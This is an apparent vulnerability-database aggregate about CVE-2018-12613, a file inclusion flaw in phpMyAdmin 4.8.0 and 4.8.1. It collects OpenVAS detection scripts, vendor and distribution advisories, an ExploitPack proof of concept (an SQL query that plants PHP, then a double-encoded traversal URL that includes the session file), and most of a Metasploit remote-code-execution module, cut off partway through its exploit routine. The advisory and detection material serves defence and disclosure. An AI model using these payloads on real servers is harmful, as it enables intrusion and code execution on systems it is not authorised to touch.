An issue was discovered in phpMyAdmin 4.8.x before 4.8.2 (i.e. 4.8.0 and 4.8.1), in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages: the public exploits collected below pass a double-URL-encoded `?` (`%253f`) followed by `../` traversal in the `target` parameter of index.php, after first planting PHP code, via an ordinary SQL query, in a file the PHP process can read (the PHP session file on Linux, or a MySQL table `.frm` file on Windows). An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can point phpMyAdmin at any MySQL host they already control, and so execute arbitrary code on the phpMyAdmin server) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). Upgrade to 4.8.2 or apply the referenced 4.8-branch commit; a restrictive PHP `open_basedir` limits which files can be read but does not remove the flaw, and vulnerable instances should not be run with either of the two configuration directives above.
{"openvas": [{"lastseen": "2019-05-29T18:32:35", "description": "The host is installed with phpMyAdmin and\n is prone to a file inclusion vulnerability.", "cvss3": {}, "published": "2018-06-26T00:00:00", "type": "openvas", "title": "phpMyAdmin File Inclusion Vulnerability (PMASA-2018-4)-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813449", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813449", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# phpMyAdmin File Inclusion Vulnerability (PMASA-2018-4)-Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813449\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-12613\");\n script_bugtraq_id(104532);\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-26 11:47:09 +0530 (Tue, 26 Jun 2018)\");\n script_name(\"phpMyAdmin File Inclusion Vulnerability (PMASA-2018-4)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with phpMyAdmin and\n is prone to a file inclusion vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error from a portion\n of code where pages are redirected and loaded within phpMyAdmin and an improper\n test for whitelisted pages.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to view and potentially execute files on the server.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin versions 4.8.0 and 4.8.1 on windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 4.8.2 or newer. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/44928\");\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2018-4\");\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe: CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(vers == \"4.8.0\" || vers == \"4.8.1\")\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.8.2\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:35", "description": "The host is installed with phpMyAdmin and\n is prone to a file inclusion vulnerability.", "cvss3": {}, "published": "2018-06-26T00:00:00", "type": "openvas", "title": "phpMyAdmin File Inclusion Vulnerability (PMASA-2018-4)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813452", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813452", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# phpMyAdmin File Inclusion Vulnerability 
(PMASA-2018-4)-Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813452\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-12613\");\n script_bugtraq_id(104532);\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-26 17:47:09 +0530 (Tue, 26 Jun 2018)\");\n script_name(\"phpMyAdmin File Inclusion Vulnerability (PMASA-2018-4)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with phpMyAdmin and\n is prone to a file inclusion vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error from a portion\n of code where pages are redirected and loaded within phpMyAdmin and an improper\n 
test for whitelisted pages.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to view and potentially execute files on the server.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin versions 4.8.0 and 4.8.1 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 4.8.2 or newer. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/44928\");\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2018-4\");\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"os_detection.nasl\", \"secpod_phpmyadmin_detect_900129.nasl\");\n script_mandatory_keys(\"Host/runs_unixoide\", \"phpMyAdmin/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe: CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\nif(vers == \"4.8.0\" || vers == \"4.8.1\")\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.8.2\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-06-04T16:47:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-24T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for phpMyAdmin (openSUSE-SU-2018:1806-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12613", 
"CVE-2018-12581"], "modified": "2020-06-03T00:00:00", "id": "OPENVAS:1361412562310851799", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851799", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851799\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-24 05:45:58 +0200 (Sun, 24 Jun 2018)\");\n script_cve_id(\"CVE-2018-12581\", \"CVE-2018-12613\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for phpMyAdmin (openSUSE-SU-2018:1806-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is 
present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for phpMyAdmin fixes multiple issues.\n\n Security issues fixed:\n\n * CVE-2018-12613: File inclusion and remote code execution attack\n (boo#1098751)\n\n * CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\n This update to version 4.8.2 also contains number of upstream bug fixes\n and improvements.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-669=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-669=1\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:1806-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-06/msg00044.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.8.2~15.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.5, "vector": 
"AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:03", "description": "\nphpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-22T00:00:00", "type": "exploitpack", "title": "phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2018-06-22T00:00:00", "id": "EXPLOITPACK:DF440AF74FEF290DAC2A23160FAA342B", "href": "", "sourceData": "# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution\n# Date: 2018-06-21\n# Exploit Author: VulnSpy\n# Vendor Homepage: http://www.phpmyadmin.net\n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz\n# Version: 4.8.0, 4.8.1\n# Tested on: php7 mysql5\n# CVE : CVE-2018-12613\n\n1. Run SQL Query : select '<?php phpinfo();exit;?>'\n2. 
Include the session file :\nhttp://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-06-29T14:44:12", "description": "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an\nattacker can include (view and potentially execute) files on the server.\nThe vulnerability comes from a portion of code where pages are redirected\nand loaded within phpMyAdmin, and an improper test for whitelisted pages.\nAn attacker must be authenticated, except in the\n\"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify\nany host he/she is already in control of, and execute arbitrary code on\nphpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the\nlogin requirement and runs the vulnerable code without any authentication).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-21T00:00:00", "type": "ubuntucve", "title": "CVE-2018-12613", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2018-12613"], "modified": "2018-06-21T00:00:00", "id": "UB:CVE-2018-12613", "href": "https://ubuntu.com/security/CVE-2018-12613", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T15:29:49", "description": "phpmyadmin is vulnerable to remote code execution (RCE) attacks. The application does not properly check page validity when they are loaded or redirected, allowing a malicious user to view and execute files on the server.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-22T03:26:00", "type": "veracode", "title": "Remote Code Execution (RCE) Through File Inclusion", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2019-05-15T06:18:40", "id": "VERACODE:6836", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-6836/summary", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-08-05T23:19:26", "description": "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include 
(view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-21T00:00:00", "type": "attackerkb", "title": "CVE-2018-12613", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2021-11-03T00:00:00", "id": "AKB:BA45FF30-F585-4D16-9F67-15082557C725", "href": "https://attackerkb.com/topics/yt30wKO8Gc/cve-2018-12613", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "phpmyadmin": 
[{"lastseen": "2023-06-23T15:09:46", "description": "## PMASA-2018-4\n\n**Announcement-ID:** PMASA-2018-4\n\n**Date:** 2018-06-19\n\n**Updated:** 2018-06-21\n\n### Summary\n\nFile inclusion and remote code execution attack\n\n### Description\n\nA flaw has been discovered where an attacker can include (view and potentially execute) files on the server.\n\nThe vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages.\n\nAn attacker must be authenticated, except in these situations:\n\n * $cfg['AllowArbitraryServer'] = true: attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin\n * $cfg['ServerDefault'] = 0: this bypasses the login and runs the vulnerable code without any authentication\n\n### Severity\n\nWe consider this to be severe.\n\n### Mitigation factor\n\nConfiguring PHP with a restrictive `open_basedir` can greatly restrict an attacker's ability to view files on the server. Vulnerable systems should not be run with the phpMyAdmin directives $cfg['AllowArbitraryServer'] = true or $cfg['ServerDefault'] = 0\n\n### Affected Versions\n\nphpMyAdmin 4.8.0 and 4.8.1 are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 4.8.2 or newer or apply patch listed below.\n\n### References\n\nHenry Huang, an independent security researcher, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.\n\nAssigned CVE ids: [CVE-2018-12613](<https://vulners.com/cve/CVE-2018-12613>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>)\n\n### Patches\n\nThe following commits have been made on the 4.8 branch to fix this issue:\n\n * [7662d02939fb3cf6f0d9ec32ac664401dcfe7490](<https://github.com/phpmyadmin/phpmyadmin/commit/7662d02939fb3cf6f0d9ec32ac664401dcfe7490>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. 
Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-19T00:00:00", "type": "phpmyadmin", "title": "File inclusion and remote code execution attack", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2018-06-21T00:00:00", "id": "PHPMYADMIN:PMASA-2018-4", "href": "https://www.phpmyadmin.net/security/PMASA-2018-4/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-07-13T17:34:27", "description": "", "cvss3": {}, "published": "2018-07-12T00:00:00", "type": "packetstorm", "title": "phpMyAdmin Authenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2018-07-12T00:00:00", "id": "PACKETSTORM:148534", "href": "https://packetstormsecurity.com/files/148534/phpMyAdmin-Authenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < 
Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'phpMyAdmin Authenticated Remote Code Execution', \n'Description' => %q{ \nphpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, \nwhich can be exploited post-authentication to execute PHP code by \napplication. The module has been tested with phpMyAdmin v4.8.1. \n}, \n'Author' => \n[ \n'ChaMd5', # Vulnerability discovery and PoC \n'Henry Huang', # Vulnerability discovery and PoC \n'Jacob Robles' # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'BID', '104532' ], \n[ 'CVE', '2018-12613' ], \n[ 'CWE', '661' ], \n[ 'URL', 'https://www.phpmyadmin.net/security/PMASA-2018-4/' ], \n[ 'URL', 'https://www.secpulse.com/archives/72817.html' ], \n[ 'URL', 'https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/' ] \n], \n'Privileged' => false, \n'Platform' => [ 'php' ], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'Windows', {} ], \n[ 'Linux', {} ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jun 19 2018')) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"Base phpMyAdmin directory path\", '/phpmyadmin/']), \nOptString.new('USERNAME', [ true, \"Username to authenticate with\", 'root']), \nOptString.new('PASSWORD', [ false, \"Password to authenticate with\", '']) \n]) \nend \n \ndef check \nbegin \nres = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) }) \nrescue \nvprint_error(\"#{peer} - Unable to connect to server\") \nreturn Exploit::CheckCode::Unknown \nend \n \nif res.nil? 
|| res.code != 200 \nvprint_error(\"#{peer} - Unable to query /js/messages.php\") \nreturn Exploit::CheckCode::Unknown \nend \n \n# v4.8.0 || 4.8.1 phpMyAdmin \nif res.body =~ /PMA_VERSION:\"(\\d+\\.\\d+\\.\\d+)\"/ \nversion = Gem::Version.new($1) \nvprint_status(\"#{peer} - phpMyAdmin version: #{version}\") \n \nif version == Gem::Version.new('4.8.0') || version == Gem::Version.new('4.8.1') \nreturn Exploit::CheckCode::Appears \nend \nreturn Exploit::CheckCode::Safe \nend \n \nreturn Exploit::CheckCode::Unknown \nend \n \ndef query(uri, qstring, cookies, token) \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(uri, 'import.php'), \n'cookie' => cookies, \n'vars_post' => Hash[{ \n'sql_query' => qstring, \n'db' => '', \n'table' => '', \n'token' => token \n}.to_a.shuffle] \n}) \nend \n \ndef lfi(uri, data_path, cookies, token) \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(uri, 'index.php'), \n'cookie' => cookies, \n'encode_params' => false, \n'vars_get' => { \n'target' => \"db_sql.php%253f#{'/..'*16}#{data_path}\" \n} \n}) \nend \n \ndef exploit \nunless check == Exploit::CheckCode::Appears \nfail_with(Failure::NotVulnerable, 'Target is not vulnerable') \nend \n \nuri = target_uri.path \nvprint_status(\"#{peer} - Grabbing CSRF token...\") \n \nresponse = send_request_cgi({'uri' => uri}) \n \nif response.nil? \nfail_with(Failure::NotFound, \"#{peer} - Failed to retrieve webpage grabbing CSRF token\") \nelsif response.body !~ /token\"\\s*value=\"(.*?)\"/ \nfail_with(Failure::NotFound, \"#{peer} - Couldn't find token. Is URI set correctly?\") \nend \ntoken = Rex::Text.html_decode($1) \n \nif target.name =~ /Automatic/ \n/\\((?<srv>Win.*)?\\)/ =~ response.headers['Server'] \nmytarget = srv.nil? ? 
'Linux' : 'Windows' \nelse \nmytarget = target.name \nend \n \nvprint_status(\"#{peer} - Identified #{mytarget} target\") \n \n#Pull out the last two cookies \ncookies = response.get_cookies \ncookies = cookies.split[-2..-1].join(' ') \n \nvprint_status(\"#{peer} - Retrieved token #{token}\") \nvprint_status(\"#{peer} - Retrieved cookies #{cookies}\") \nvprint_status(\"#{peer} - Authenticating...\") \n \nlogin = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(uri, 'index.php'), \n'cookie' => cookies, \n'vars_post' => { \n'token' => token, \n'pma_username' => datastore['USERNAME'], \n'pma_password' => datastore['PASSWORD'] \n} \n}) \n \nif login.nil? || login.code != 302 \nfail_with(Failure::NotFound, \"#{peer} - Failed to retrieve webpage\") \nend \n \n#Ignore the first cookie \ncookies = login.get_cookies \ncookies = cookies.split[1..-1].join(' ') \nvprint_status(\"#{peer} - Retrieved cookies #{cookies}\") \n \nlogin_check = send_request_cgi({ \n'uri' => normalize_uri(uri, 'index.php'), \n'vars_get' => { 'token' => token }, \n'cookie' => cookies \n}) \n \nif login_check.nil? \nfail_with(Failure::NotFound, \"#{peer} - Failed to retrieve webpage\") \nelsif login_check.body.include? 'Welcome to' \nfail_with(Failure::NoAccess, \"#{peer} - Authentication failed\") 